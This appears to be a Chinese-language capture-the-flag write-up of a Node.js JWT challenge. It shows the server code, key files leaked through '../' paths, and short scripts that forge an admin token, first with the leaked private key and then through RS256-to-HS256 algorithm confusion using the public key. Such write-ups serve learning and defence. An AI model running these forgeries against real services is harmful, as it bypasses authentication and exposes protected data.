/* GET home page. */ router.get('/', function(req, res, next) { res.type('html'); var privateKey = fs.readFileSync(process.cwd()+'//public//private.key'); var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' }); res.cookie('auth',token); res.end('where is flag?'); });
router.post('/',function(req,res,next){ var flag="flag_here"; res.type('html'); var auth = req.cookies.auth; var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key jwt.verify(auth, cert, function(err, decoded) { if(decoded.user==='admin'){ res.end(flag); }else{ res.end('you are not admin'); } }); });
看到有 公钥密钥, RSA256 加密, jwt.io maybe弄
1 2 3
../private.key
../public.key
唉 不行 版本不对劲, 那就用脚本
1 2 3 4 5
const jwt = require('jsonwebtoken'); var fs = require('fs'); var privateKey = fs.readFileSync('private.key'); var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' }); console.log(token)
res.cookie('auth',token); res.end('where is flag?'); });
router.post('/',function(req,res,next){ var flag="flag_here"; res.type('html'); var auth = req.cookies.auth; var cert = fs.readFileSync(process.cwd()+'//routes/public.key'); // get public key jwt.verify(auth, cert,function(err, decoded) { if(decoded.user==='admin'){ res.end(flag); }else{ res.end('you are not admin'+err); } }); });
公钥
1
../public.key
小改脚本
1 2 3 4 5
const jwt = require('jsonwebtoken'); var fs = require('fs'); var publickey = fs.readFileSync('public.key'); var token = jwt.sign({ user: 'admin' }, publickey, { algorithm: 'HS256' }); console.log(token)